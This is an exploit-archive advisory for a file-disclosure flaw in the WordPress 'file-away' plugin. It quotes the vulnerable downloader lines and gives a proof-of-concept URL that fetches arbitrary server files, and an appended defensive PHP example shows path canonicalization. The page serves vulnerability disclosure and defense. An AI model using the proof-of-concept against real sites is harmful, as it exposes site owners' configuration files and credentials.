CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-12800 | CWE-200 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-07-09 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N | 0.74 | 0.99964 |
Title: WordPress file-away plugin - File Disclosure
Author: Abolfazl Hajizade
Vendor: https://wordpress.org/plugins/file-away/
Version: 3.9.6.1
Date: 7.7.2018
Tested on: Windows-linux

Vulnerable page: /file-away/lib/cls/class.fileaway_downloader.php

Vulnerable Source:
line 16: $file = $this->decrypt($_GET['fileaway']);
line 35: $file = fopen($file, 'rb');
line 40: fread($file, 1024 * 8))

POC:
http://site.com/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=path_file

=============================================
WebSite : UltraSec.Org
Channel : @UltraSecurity
Email : [email protected]
Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar
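A defensive counterpart to the three quoted source lines, as an added example (not File Away's code and not the vendor's patch): canonicalize the requested path and refuse anything outside a single download directory before `fopen()` is called. The function names, the `$allowedBase` directory and the temp-directory demo data are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not File Away's code or the vendor's fix.
// $allowedBase is an assumed setting: the only directory downloads may come from.
function resolve_download_path(string $requested, string $allowedBase): ?string
{
    // Refuse empty values, NUL bytes and stream wrappers (php://, phar://, http://).
    if ($requested === '' || strpos($requested, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*://#i', $requested)) {
        return null;
    }
    $base = realpath($allowedBase);
    // Interpret the value relative to the base, then canonicalize: realpath()
    // resolves "..", "." and symlinks, and returns false if nothing exists there.
    $real = $base === false ? false
        : realpath($base . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check with a trailing separator, so that a sibling such as
    // "/srv/files-private" does not pass as being inside "/srv/files".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

function stream_download(string $requested, string $allowedBase): bool
{
    $path = resolve_download_path($requested, $allowedBase);
    $fh = $path === null ? false : fopen($path, 'rb');
    if ($fh === false) {
        http_response_code(404);   // same answer for "missing" and "not allowed"
        return false;
    }
    while (!feof($fh)) {
        echo fread($fh, 1024 * 8);
    }
    fclose($fh);
    return true;
}

// Constructed demo data: a temp download directory with one file, plus a sibling.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fa_demo_' . bin2hex(random_bytes(4));
mkdir("$root/files", 0700, true);
mkdir("$root/files-private", 0700, true);
file_put_contents("$root/files/report.txt", "public\n");
file_put_contents("$root/files-private/secret.txt", "private\n");
foreach (['report.txt', '../files-private/secret.txt', 'php://stdin'] as $value) {
    $verdict = resolve_download_path($value, "$root/files") === null ? 'refused' : 'allowed';
    printf("%-30s %s\n", $value, $verdict);
}
```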
Copyright ©2024 Exploitalert.